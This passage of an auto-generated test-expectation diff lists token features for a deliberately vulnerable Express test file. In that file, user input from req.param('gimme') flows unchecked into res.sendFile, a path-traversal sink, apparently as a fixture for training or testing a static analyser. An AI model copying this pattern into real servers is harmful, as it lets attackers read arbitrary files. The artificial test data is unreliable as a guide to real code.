| enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:14 | res.sendFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:14 | res.sendFile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:34 | exceptional return of res.sen ... imme")) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:34 | exceptional return of res.sen ... imme")) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:34 | exceptional return of res.sen ... imme")) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:34 | exceptional return of res.sen ... imme")) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:34 | exceptional return of res.sen ... imme")) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:34 | res.sen ... imme")) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:34 | res.sen ... imme")) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:34 | res.sen ... imme")) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:34 | res.sen ... imme")) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:34 | res.sen ... imme")) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:8:7:8:14 | sendFile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:8:7:8:14 | sendFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:8:7:8:14 | sendFile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:8:7:8:14 | sendFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:8:7:8:14 | sendFile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:18 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:18 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:18 | req | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:18 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:18 | req | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:24 | req.param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:24 | req.param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:24 | req.param | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:24 | req.param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:24 | req.param | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:33 | exceptional return of req.param("gimme") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:33 | exceptional return of req.param("gimme") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:33 | exceptional return of req.param("gimme") | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:33 | exceptional return of req.param("gimme") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:33 | exceptional return of req.param("gimme") | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:33 | req.param("gimme") | CalleeFlexibleAccessPath | res.sendFile | | autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:33 | req.param("gimme") | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:33 | req.param("gimme") | contextFunctionInterfaces | | @@ -10945,6 +85787,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:33 | req.param("gimme") | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:33 | req.param("gimme") | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:8:16:8:33 | req.param("gimme") | receiverName | res | +| autogenerated/TaintedPath/tainted-sendFile.js:8:20:8:24 | param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:8:20:8:24 | param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:8:20:8:24 | param | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:8:20:8:24 | param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:8:20:8:24 | param | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:8:26:8:32 | "gimme" | CalleeFlexibleAccessPath | req.param | | autogenerated/TaintedPath/tainted-sendFile.js:8:26:8:32 | "gimme" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:8:26:8:32 | "gimme" | contextFunctionInterfaces | | @@ -10953,6 +85800,46 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:8:26:8:32 | "gimme" | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:8:26:8:32 | "gimme" | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:8:26:8:32 | "gimme" | receiverName | req | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:5 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:5 | res | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:5 | res | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:14 | res.sendfile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:14 | res.sendfile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:14 | res.sendfile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:14 | res.sendfile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:14 | res.sendfile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:34 | exceptional return of res.sen ... imme")) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:34 | exceptional return of res.sen ... imme")) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:34 | exceptional return of res.sen ... imme")) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:34 | exceptional return of res.sen ... imme")) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:34 | exceptional return of res.sen ... imme")) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:34 | res.sen ... imme")) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:34 | res.sen ... imme")) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:34 | res.sen ... imme")) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:34 | res.sen ... imme")) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:10:3:10:34 | res.sen ... imme")) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:10:7:10:14 | sendfile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:10:7:10:14 | sendfile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:10:7:10:14 | sendfile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:10:7:10:14 | sendfile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:10:7:10:14 | sendfile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:18 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:18 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:18 | req | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:18 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:18 | req | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:24 | req.param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:24 | req.param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:24 | req.param | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:24 | req.param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:24 | req.param | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:33 | exceptional return of req.param("gimme") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:33 | exceptional return of req.param("gimme") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:33 | exceptional return of req.param("gimme") | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:33 | exceptional return of req.param("gimme") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:33 | exceptional return of req.param("gimme") | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:33 | req.param("gimme") | CalleeFlexibleAccessPath | res.sendfile | | autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:33 | req.param("gimme") | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:33 | req.param("gimme") | contextFunctionInterfaces | | @@ -10961,6 +85848,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:33 | req.param("gimme") | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:33 | req.param("gimme") | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:10:16:10:33 | req.param("gimme") | receiverName | res | +| autogenerated/TaintedPath/tainted-sendFile.js:10:20:10:24 | param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:10:20:10:24 | param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:10:20:10:24 | param | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:10:20:10:24 | param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:10:20:10:24 | param | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:10:26:10:32 | "gimme" | CalleeFlexibleAccessPath | req.param | | autogenerated/TaintedPath/tainted-sendFile.js:10:26:10:32 | "gimme" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:10:26:10:32 | "gimme" | contextFunctionInterfaces | | @@ -10969,6 +85861,46 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:10:26:10:32 | "gimme" | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:10:26:10:32 | "gimme" | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:10:26:10:32 | "gimme" | receiverName | req | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:5 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:5 | res | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:5 | res | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:14 | res.sendFile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:14 | res.sendFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:14 | res.sendFile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:14 | res.sendFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:14 | res.sendFile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:59 | exceptional return of res.sen ... wd() }) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:59 | exceptional return of res.sen ... wd() }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:59 | exceptional return of res.sen ... wd() }) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:59 | exceptional return of res.sen ... wd() }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:59 | exceptional return of res.sen ... wd() }) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:59 | res.sen ... wd() }) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:59 | res.sen ... wd() }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:59 | res.sen ... wd() }) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:59 | res.sen ... wd() }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:13:3:13:59 | res.sen ... wd() }) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:13:7:13:14 | sendFile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:7:13:14 | sendFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:13:7:13:14 | sendFile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:13:7:13:14 | sendFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:13:7:13:14 | sendFile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:18 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:18 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:18 | req | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:18 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:18 | req | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:24 | req.param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:24 | req.param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:24 | req.param | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:24 | req.param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:24 | req.param | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:33 | exceptional return of req.param("gimme") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:33 | exceptional return of req.param("gimme") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:33 | exceptional return of req.param("gimme") | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:33 | exceptional return of req.param("gimme") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:33 | exceptional return of req.param("gimme") | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:33 | req.param("gimme") | CalleeFlexibleAccessPath | res.sendFile | | autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:33 | req.param("gimme") | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:33 | req.param("gimme") | contextFunctionInterfaces | | @@ -10977,6 +85909,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:33 | req.param("gimme") | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:33 | req.param("gimme") | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:13:16:13:33 | req.param("gimme") | receiverName | res | +| autogenerated/TaintedPath/tainted-sendFile.js:13:20:13:24 | param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:20:13:24 | param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:13:20:13:24 | param | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:13:20:13:24 | param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:13:20:13:24 | param | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:13:26:13:32 | "gimme" | CalleeFlexibleAccessPath | req.param | | autogenerated/TaintedPath/tainted-sendFile.js:13:26:13:32 | "gimme" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:13:26:13:32 | "gimme" | contextFunctionInterfaces | | @@ -10993,6 +85930,36 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:13:36:13:58 | { root: ... cwd() } | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:13:36:13:58 | { root: ... cwd() } | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:13:36:13:58 | { root: ... cwd() } | receiverName | res | +| autogenerated/TaintedPath/tainted-sendFile.js:13:38:13:41 | root | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:38:13:41 | root | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:13:38:13:41 | root | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:13:38:13:41 | root | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:13:38:13:41 | root | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:13:38:13:56 | root: process.cwd() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:38:13:56 | root: process.cwd() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:38:13:56 | root: process.cwd() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:38:13:56 | root: process.cwd() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:38:13:56 | root: process.cwd() | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:13:38:13:56 | root: process.cwd() | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:13:38:13:56 | root: process.cwd() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:13:38:13:56 | root: process.cwd() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:13:38:13:56 | root: process.cwd() | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:13:38:13:56 | root: process.cwd() | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:50 | process | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:50 | process | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:50 | process | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:50 | process | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:50 | process | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:54 | process.cwd | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:54 | process.cwd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:13:44:13:54 | process.cwd | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join 